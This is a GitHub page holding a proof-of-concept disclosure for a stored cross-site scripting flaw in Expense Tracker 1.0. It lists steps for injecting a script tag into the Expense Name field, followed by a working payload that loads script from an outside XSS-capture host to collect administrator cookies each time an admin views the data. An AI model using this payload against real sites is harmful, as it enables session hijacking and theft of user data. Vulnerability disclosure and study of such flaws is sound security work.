Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
cve-request/cve-poc-payload
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
25 lines (20 sloc)
1.32 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Expense Tracker 1.0 - Stored Cross-Site Scripting | |
| # Exploit Author: Shivam Verma(cyb3r_n3rd) | |
| # Date: 2022-11-05 | |
| # Vendor Homepage: https://code-projects.org/expense-tracker-in-php-with-source-code/ | |
| # Software Link: https://code-projects.org | |
| # Version: 1.0 | |
| # Category: Web Application | |
| # Tested on: Parrot OS | |
| # Contact: https://www.linkedin.com/in/shivam413 | |
| Stored Cross Site Scripting(Xss): Stored XSS, It occurs when a malicious script is injected directly into a vulnerable web application and gets Stored in the Server as any query fields or logs | |
| Attacker Retrieves the logs data with captured admin cookie every time someone triggers malicious script | |
| Attack Vector: This Vulnerability Leads an Attacker to Inject Malicious Payloads in Expense Category section and Paste the Payload in the Desired field each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data in Plain Text | |
| Step 1. Install The Software | |
| Step 2. Click on Add Expense Category | |
| Step 3. Now paste your Xss Payload in the Parameter(Expense Name) | |
| Step 4. Click on Add | |
| Step 5. Wait for the Administrator to click on Your link | |
| Step 6. You will receive Admin Cookie Everytime he Process the Request | |
| --- | |
| XSS Payload: "><script src=https://nick413.xss.ht></script> |